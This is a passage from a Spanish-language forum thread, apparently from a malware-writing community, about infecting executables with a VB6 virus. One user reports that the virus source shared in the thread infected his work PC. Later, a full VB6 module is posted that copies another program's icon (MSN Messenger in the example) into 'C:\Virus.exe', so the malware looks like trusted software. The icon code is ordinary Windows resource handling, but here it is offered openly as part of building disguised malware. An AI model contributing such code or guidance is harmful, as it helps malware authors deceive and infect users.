Autor
|
Tema: [Source] Infección de ejecutables en VB6 (Leído 22,542 veces)
|
Saok Dagon
Desconectado
Mensajes: 115
SaOk
|
gracias eso me a venido perfecto. Bien ya tengo extraido el icono, ahora lo que necesito es remplazarlo (usare el iconchanger), aver si esta bien asi la estructura: ReplaceIcons picViewIcon.Picture, Victim (picViewIcon.Picture = el_icono ; Victim = la_ruta_del_exe) asi valdria o faltaria ponerle algo mas? saludos
|
|
|
En línea
|
|
|
|
|
LeandroA
|
hola me temo que ninguno de los modulos presentes son eficientes la unica forma de que quede un buen trabajo es trabajar con las apis LoadResource,EnumResourceLanguages,EnumResourceNamesByNum EnumResourceNamesByString,EnumResourceTypes y especialmente BeginUpdateResource,UpdateResource,EndUpdateResource
voy a ver si puedo hacer un modulo para cambiar el icono de un exe por otro exe
|
|
|
En línea
|
|
|
|
Saok Dagon
Desconectado
Mensajes: 115
SaOk
|
Hola
ok aver que tal te queda, porque yo desarrole el mio atraves de todo lo que me sugirieron me eran demasiadas lineas, me ongordaba demasiado el bicho
saludos
|
|
|
En línea
|
|
|
|
slossetti
Desconectado
Mensajes: 2
|
Hola, entro al foro porque alguien entro a la maquina donde yo trabajo y entro a este foro y adrede descargo el codigo en cuestion y me infecto la PC. Buscando algo de información encontre este foro, queria preguntarles de que manera se puede eliminarlo ya que hace imposible usar la PC.
Gracias.
|
|
|
En línea
|
|
|
|
Saok Dagon
Desconectado
Mensajes: 115
SaOk
|
si nos dices cual es el codigo en cuestion se puede hacer una "vacuna" para el.
Si no, busca entre tus procesos y mata el del virus o el que te parezca sospechoso, y luego pasa el AV aver si hace algo de provecho.
|
|
|
En línea
|
|
|
|
slossetti
Desconectado
Mensajes: 2
|
Es el que hablan en ucestion en este post, que esta para bajar el source.
En cada proceso y archivo que ejecuta la PC se abre una ventana que dice "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot"
Saludos.
|
|
|
En línea
|
|
|
|
byebye
Desconectado
Mensajes: 5.093
|
pues te pillas un editor hexadecimal y sabiendo el tamaño del archivo pues lo tienes facil de quitar. segun creo recordar decian que estaba hecho para actuar de la siguiente forma virus+marca+programa original. si no se modifica nada en cada infeccion el tamaño es fijo sabiendo el del virus recuperas rapido el original o si no como hay 2 cabeceras las buscas y lo arreglas.
|
|
|
En línea
|
|
|
|
Mad Antrax
|
Es el que hablan en ucestion en este post, que esta para bajar el source.
En cada proceso y archivo que ejecuta la PC se abre una ventana que dice "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot"
Saludos.
Vaya tela, mira que dije claramente: OJO no el código compilado en vuestra maquina, porque infectaria vuestros archivos xD Ir con cuidado, Saludos!!Bueno, si ha sido con el mismo source de la primera pagina se puede crear una simple vacuna cambiando unos valores... pero ahora mismo no tengo tiempo ni de mirarmelo. Tendrás que esperar al fin de semana o esperar a ver si algu usuario lo hace
|
|
|
En línea
|
No hago hacks/cheats para juegos Online. Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
|
|
|
LeandroA
|
bueno siguiendo con el tema de los iconos, pongo un modulo para cambiar el icono de un exe por el de otro exe, esta un poco extenso ya que no esta echo para este proposito, pero se puede resumir vastante y optimizar mas, En un modulo bas Option Explicit 'modificado by LIA 14/04/07 Private Type ICONDIRENTRY bWidth As Byte '// Width of the image bHeight As Byte '// Height of the image (times 2) bColorCount As Byte '// Number of colors in image (0 if >=8bpp) bReserved As Byte '// Reserved wPlanes As Integer '// Color Planes wBitCount As Integer '// Bits per pixel dwBytesInRes As Long '// how many bytes in this resource? dwImageOffset As Long '// where in the file is this image End Type
Private Type ICONDIR idReserved As Integer '// Reserved idType As Integer '// resource type (1 for icons) idCount As Integer '// how many images? 'idEntries() as ICONDIRENTRY array follows. End Type
Private Type tBits bBits() As Byte End Type
Private Type IcoExe IcoDir As ICONDIR Entries() As ICONDIRENTRY End Type
Private Type Ico IcoDir As ICONDIR 'entete Entries() As ICONDIRENTRY 'decrit chaque icone IcoData() As tBits 'données End Type
Private Type MEMICONDIRENTRY bWidth As Byte '// Width of the image bHeight As Byte '// Height of the image (times 2) bColorCount As Byte '// Number of colors in image (0 if >=8bpp) bReserved As Byte '// Reserved wPlanes As Integer '// Color Planes wBitCount As Integer '// Bits per pixel dwBytesInRes As Long '// how many bytes in this resource? nID As Integer '// the ID End Type
Private Const IMAGE_ICON = 1
' File read/write through Win32. Declares are modified from the VB versions to allow null to be passed to lpSecurityAttributes and lpOverlapped: Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long Private Const GENERIC_READ = &H80000000 Private Const GENERIC_WRITE = &H40000000 Private Const OPEN_EXISTING = 3 Private Const CREATE_ALWAYS = 2 Private Const FILE_ATTRIBUTE_NORMAL = &H80 Private Const INVALID_HANDLE_VALUE = -1 Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long Private Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long Private Const FILE_BEGIN = 0
' Resource functions: Private Declare Function LoadLibraryEx Lib "kernel32" Alias "LoadLibraryExA" (ByVal lpLibFileName As String, ByVal hFile As Long, ByVal dwFlags As Long) As Long
Private Const LOAD_LIBRARY_AS_DATAFILE = &H2& Private Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long Private Declare Function LoadResource Lib "kernel32" (ByVal hInstance As Long, ByVal hResInfo As Long) As Long Private Declare Function LockResource Lib "kernel32" (ByVal hResData As Long) As Long Private Declare Function FindResource Lib "kernel32" Alias "FindResourceA" (ByVal hInstance As Long, lpName As Any, lpType As Any) As Long Private Declare Function SizeofResource Lib "kernel32" (ByVal hInstance As Long, ByVal hResInfo As Long) As Long Private Declare Function FreeResource Lib "kernel32" (ByVal hResData As Long) As Long Private Declare Function BeginUpdateResource Lib "kernel32.dll" Alias "BeginUpdateResourceA" (ByVal pFileName As String, ByVal bDeleteExistingResources As Long) As Long Private Declare Function UpdateResource Lib "kernel32.dll" Alias "UpdateResourceA" (ByVal hUpdate As Long, ByVal lpType As Long, ByVal lpName As Long, ByVal wLanguage As Long, lpData As Any, ByVal cbData As Long) As Long Private Declare Function EndUpdateResource Lib "kernel32.dll" Alias "EndUpdateResourceA" (ByVal hUpdate As Long, ByVal fDiscard As Long) As Long Private Declare Function EnumResourceNamesByNum Lib "kernel32" Alias "EnumResourceNamesA" (ByVal hModule As Long, ByVal lpType As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long
Private Const RT_ICON = 3 Private Const DIFFERENCE = 11 Private Const RT_GROUP_ICON = RT_ICON + DIFFERENCE
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" ( _ lpvDest As Any, lpvSource As Any, ByVal cbCopy As Long)
Private m_sFile As String Private m_vID As Variant Private m_tID As ICONDIR Private m_tIDE() As ICONDIRENTRY Private m_tBits() As tBits Private m_VName As Variant Public Function RemplaceIcons(Source As String, Dest As String) As Boolean
Dim m_hMod As Long
If Not CanWrite(Dest) Then Exit Function
m_hMod = LoadLibraryEx(Source, ByVal 0&, LOAD_LIBRARY_AS_DATAFILE) Call EnumResourceNamesByNum(m_hMod, RT_GROUP_ICON, AddressOf EnumResNamesProc, 0) FreeLibrary m_hMod
If (VarType(m_VName) = vbLong) Then LoadIconFromEXE Source, m_VName Else LoadIconFromEXE Source, , m_VName End If SaveIcon "c:\" & m_VName & ".ico" m_hMod = LoadLibraryEx(Source, ByVal 0&, LOAD_LIBRARY_AS_DATAFILE) Call EnumResourceNamesByNum(m_hMod, RT_GROUP_ICON, AddressOf EnumResNamesProc, 0) FreeLibrary m_hMod
If ReplaceIcoInExe(Dest, "c:\" & m_VName & ".ico", 1, m_VName, 0) Then RemplaceIcons = True End If
End Function
Private Function CanWrite(File As String) As Boolean On Local Error GoTo Denegar Dim FF As Integer FF = FreeFile Open File For Binary Access Write As #1 Close CanWrite = True Exit Function: Denegar: End Function
Private Function LoadIconFromEXE( _ ByVal sFile As String, _ Optional ByVal lpID As Long = 0, _ Optional ByVal lpName As String = "" _ ) As Boolean Dim hLibrary As Long Dim hRsrc As Long Dim hGlobal As Long Dim lPtr As Long Dim iEntry As Long Dim tMIDE As MEMICONDIRENTRY Dim nID() As Integer Dim iBaseOffset As Long Dim lSize As Long Dim bFail As Boolean
' Loads an Icon from an Executable (EXE, DLL etc). Use the EnumResources module ' to determine the available resource IDs.
m_sFile = sFile m_vID = Empty Erase m_tIDE Erase m_tBits With m_tID .idCount = 0 .idReserved = 0 .idType = 0 End With
hLibrary = LoadLibraryEx(sFile, ByVal 0&, LOAD_LIBRARY_AS_DATAFILE) If (hLibrary = 0) Then ' Failed to load the executable. Probably not a Win32 EXE. 'Err.Raise vbObjectError + 1048 + 6, App.EXEName & ".cFileIcon", "Can't load library." LoadIconFromEXE = False Else ' Find the resource: If (lpID <> 0) Then lpName = "#" & CStr(lpID) hRsrc = FindResource(hLibrary, ByVal lpName, ByVal RT_GROUP_ICON) m_vID = lpID Else hRsrc = FindResource(hLibrary, ByVal lpName, ByVal RT_GROUP_ICON) m_vID = lpName End If If (hRsrc = 0) Then ' Resource not found in this library: 'Err.Raise vbObjectError + 1048 + 7, App.EXEName & ".cFileIcon", "Can't find resource." LoadIconFromEXE = False Else ' Load the resource (returns a handle which can be used to access the data): hGlobal = LoadResource(hLibrary, hRsrc) If (hGlobal = 0) Then 'Err.Raise vbObjectError + 1048 + 8, App.EXEName & ".cFileIcon", "Can't load resource." LoadIconFromEXE = False Else ' Lock the resource for reading (returns a pointer to the resource data): lPtr = LockResource(hGlobal) If (lPtr = 0) Then 'Err.Raise vbObjectError + 1048 + 8, App.EXEName & ".cFileIcon", "Can't lock resource." LoadIconFromEXE = False Else ' Get the icon header: CopyMemory m_tID, ByVal lPtr, Len(m_tID) Debug.Print m_tID.idCount, m_tID.idReserved, m_tID.idType ' Do we have icons in this resource? If (m_tID.idCount > 0) Then ' For each of the entries, get the icon directory information: ReDim m_tIDE(0 To m_tID.idCount - 1) As ICONDIRENTRY ReDim nID(0 To m_tID.idCount - 1) As Integer ' Get all the directory information into a byte array (to avoid ' problems with WORD alignment of structures): ReDim b(0 To Len(m_tID) + Len(tMIDE) * m_tID.idCount - 1) As Byte CopyMemory b(0), ByVal lPtr, Len(m_tID) + Len(tMIDE) * m_tID.idCount ' Loop through the entries, getting the IDs and creating a standard ' ICONDIRENTRY structure: For iEntry = 0 To m_tID.idCount - 1 ' Get the MEMICONDIRENTRY structure: CopyMemory tMIDE, b(Len(m_tID) + iEntry * Len(tMIDE)), Len(tMIDE) ' Store the icon's resource id: nID(iEntry) = tMIDE.nID ' Copy data into standard ICONDIRENTRY structure. Note the .dwImageOffset ' member will be wrong at this stage: CopyMemory m_tIDE(iEntry), tMIDE, Len(tMIDE) Next iEntry ' Now correct the ICONDIRENTRY byte offsets: iBaseOffset = Len(m_tID) + Len(m_tIDE(0)) * m_tID.idCount m_tIDE(0).dwImageOffset = iBaseOffset For iEntry = 1 To m_tID.idCount - 1 m_tIDE(iEntry).dwImageOffset = m_tIDE(iEntry - 1).dwImageOffset + m_tIDE(iEntry - 1).dwBytesInRes Next iEntry ' Now we have the ICONDIRENTRY structures, get the actual bits of the icons: ReDim m_tBits(0 To m_tID.idCount - 1) As tBits For iEntry = 0 To m_tID.idCount - 1 ' Load the icon with the specified resource ID: lpName = "#" & nID(iEntry) hRsrc = FindResource(hLibrary, ByVal lpName, ByVal RT_ICON) If (hRsrc = 0) Then bFail = True Exit For Else ' Load the resource: hGlobal = LoadResource(hLibrary, hRsrc) If (hGlobal = 0) Then bFail = True Exit For Else ' Determine the size of the resource: lSize = SizeofResource(hLibrary, hRsrc) ' If the size is valid: If (lSize > 0) And (lSize = m_tIDE(iEntry).dwBytesInRes) Then ' Lock the resource and get a pointer to the memory: lPtr = LockResource(hGlobal) If (lPtr = 0) Then bFail = True Exit For Else ' Store this memory in the bitmap bits array: ReDim Preserve m_tBits(iEntry).bBits(0 To lSize - 1) As Byte CopyMemory m_tBits(iEntry).bBits(0), ByVal lPtr, lSize End If Else bFail = True End If End If End If Next iEntry
' Did we succeed? If (bFail) Then 'Err.Raise vbObjectError + 1048 + 9, App.EXEName & ".cFileIcon", "Failed to read bitmap bits from resource." ' ensure clear: sFile = "" Erase m_tIDE Erase m_tBits m_tID.idCount = 0 m_vID = Empty End If LoadIconFromEXE = Not (bFail) End If End If End If End If ' Free library: FreeLibrary hLibrary End If End Function
Private Function SaveIcon( _ Optional ByVal sFileName As String = "" _ ) As Boolean Dim hFile As Long Dim dwBytesWritten As Long Dim iEntry As Long Dim bFail As Boolean ' General error checking: If (m_sFile = "") Then If (sFileName = "") Then 'Err.Raise vbObjectError + 1048 + 3, App.EXEName & ".cFileIcon", "No filename specified." Exit Function End If End If If (m_tID.idCount = 0) Then 'Err.Raise vbObjectError + 1048 + 4, App.EXEName & ".cFileIcon", "Icon contains no images." Exit Function End If ' Now start writing: If (sFileName <> "") Then m_sFile = sFileName End If ' Open the file for write: hFile = CreateFile(m_sFile, GENERIC_WRITE, 0, ByVal 0&, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, ByVal 0&) If (hFile = INVALID_HANDLE_VALUE) Then 'Err.Raise vbObjectError + 1048 + 4, App.EXEName & ".cFileIcon", "Couldn't open file for writing." Else ' Write the header: WriteFile hFile, m_tID, Len(m_tID), dwBytesWritten, ByVal 0& If (dwBytesWritten = Len(m_tID)) Then ' Write the ICONDIRENTRY structures: For iEntry = 0 To m_tID.idCount - 1 WriteFile hFile, m_tIDE(iEntry), Len(m_tIDE(iEntry)), dwBytesWritten, ByVal 0& If (dwBytesWritten <> Len(m_tIDE(iEntry))) Then bFail = True Exit For End If Next iEntry ' Write the icon bits: If Not (bFail) Then For iEntry = 0 To m_tID.idCount - 1 WriteFile hFile, m_tBits(iEntry).bBits(0), m_tIDE(iEntry).dwBytesInRes, dwBytesWritten, ByVal 0& If (m_tIDE(iEntry).dwBytesInRes <> dwBytesWritten) Then bFail = True Exit For End If Next iEntry End If Else bFail = True End If ' Close the file: CloseHandle hFile ' Did we succeed? If (bFail) Then 'Err.Raise vbObjectError + 1048 + 5, App.EXEName & ".cFileIcon", "General failure writing icon." End If SaveIcon = Not (bFail) End If
End Function
Private Function OpenIconFile(Filename As String) As Ico Dim t As Ico 'structure temporaire Dim X As Long 'compteur
'on ouvre le fichier Open Filename For Binary As #1 'on récupère l'entete du fichier Get #1, , t.IcoDir 'redimensionne au nombre d'icones ReDim t.Entries(0 To t.IcoDir.idCount - 1) ReDim t.IcoData(0 To t.IcoDir.idCount - 1) 'pour chaque icones For X = 0 To t.IcoDir.idCount - 1 'récupère l'entete de l'icone Get #1, 6 + 16 * X + 1, t.Entries(X) 'redimensionne à la taille des données ReDim t.IcoData(X).bBits(t.Entries(X).dwBytesInRes - 1) 'récupère les données Get #1, t.Entries(X).dwImageOffset + 1, t.IcoData(X).bBits Next 'ferme le fichier Close #1 'renvoie les données OpenIconFile = t End Function
Private Function MakeIcoExe(IconFile As Ico, IDBase As Long) As IcoExe Dim t As IcoExe 'structure temporaire Dim X As Long 'compteur
'nombre d'icones t.IcoDir.idCount = IconFile.IcoDir.idCount 'type : Icone = 1 t.IcoDir.idType = 1 'chaque entrée ReDim t.Entries(IconFile.IcoDir.idCount - 1)
'pour chaque entrée For X = 0 To t.IcoDir.idCount - 1 'entete d'icones t.Entries(X).bColorCount = IconFile.Entries(X).bColorCount t.Entries(X).bHeight = IconFile.Entries(X).bHeight t.Entries(X).bReserved = IconFile.Entries(X).bReserved t.Entries(X).bWidth = IconFile.Entries(X).bWidth t.Entries(X).dwBytesInRes = IconFile.Entries(X).dwBytesInRes t.Entries(X).dwImageOffset = X + IDBase t.Entries(X).wBitCount = IconFile.Entries(X).wBitCount t.Entries(X).wPlanes = IconFile.Entries(X).wPlanes Next 'renvoie la structure MakeIcoExe = t End Function
Private Function ReplaceIcoInExe(Filename As String, sFile As String, BaseID As Long, GroupID As Variant, LangID As Long) As Boolean Dim hWrite As Long 'handle de modification Dim Exe As IcoExe 'structure de ressource icone Dim ret As Long 'valeur de retour Dim X As Long 'compteur Dim D() As Byte 'buffer Dim IcoFile As Ico
IcoFile = OpenIconFile(sFile)
'obtient un handle de modification hWrite = BeginUpdateResource(Filename, 0)
'si échec, on quitte If hWrite = 0 Then ReplaceIcoInExe = False: Exit Function
'sinon, on lit l'icone Exe = MakeIcoExe(IcoFile, BaseID)
'on redimmensionne le buffer ReDim D(6 + 14 * Exe.IcoDir.idCount) 'on copie les données dans le buffer CopyMemory ByVal VarPtr(D(0)), ByVal VarPtr(Exe.IcoDir), 6
'pour chaque icone For X = 0 To Exe.IcoDir.idCount - 1 'on copie les données CopyMemory ByVal VarPtr(D(6 + 14 * X)), ByVal VarPtr(Exe.Entries(X).bWidth), 14& Next
'on met à jour la ressource groupe icone ret = UpdateResource(hWrite, RT_GROUP_ICON, GroupID, LangID, ByVal VarPtr(D(0)), UBound(D))
'si échec, on quitte If ret = 0 Then ReplaceIcoInExe = False: EndUpdateResource hWrite, 1: Exit Function
'on met à jour chaque ressource icone For X = 0 To Exe.IcoDir.idCount - 1 ret = UpdateResource(hWrite, RT_ICON, Exe.Entries(X).dwImageOffset, LangID, ByVal VarPtr(IcoFile.IcoData(X).bBits(0)), Exe.Entries(X).dwBytesInRes) Next
'on enregsitre dans le fichier executable ret = EndUpdateResource(hWrite, 0) 'si échec, on quitte If ret = 0 Then ReplaceIcoInExe = False: Exit Function
'sinon succès ReplaceIcoInExe = True End Function
Public Function EnumResNamesProc( _ ByVal hMod As Long, _ ByVal lpszType As Long, _ ByVal lpszName As Long, _ ByVal lParam As Long _ ) As Long Dim b() As Byte, lLen As Long
If (lpszName And &HFFFF0000) = 0 Then m_VName = lpszName And &HFFFF& Else lLen = lstrlen(lpszName) If (lLen > 0) Then ReDim b(0 To lLen - 1) As Byte CopyMemory b(0), ByVal lpszName, lLen m_VName = StrConv(b, vbUnicode) End If
End If
End Function
para provarlo en un formulario con un boton y un exe en c:\ llamdo virus.exe (Aclaro esto es inofencivo no hay problemas solo cambia el icono)Private Sub Command1_Click() 'la primera es a la que se le quiere sacar el icono por ejemplo MsnMesenger 'y la segunda a la que se lo vamos a agregar osea virus.exe MsgBox RemplaceIcons("C:\Archivos de programa\MSN Messenger\msnmsgr.exe", "C:\Virus.exe") End Sub
algunas apis solo trabajan vajo win XP pero hay substitutos asi que si les interesa se puede mejorar tambien, no lo hice porque no tengo win 98 y no sabia si iva a funcionar, pero cualquier cosa lo vemos y lo modificamos Saludos
|
|
« Última modificación: 14 Abril 2007, 23:54 pm por LeandroA »
|
En línea
|
|
|
|
|
|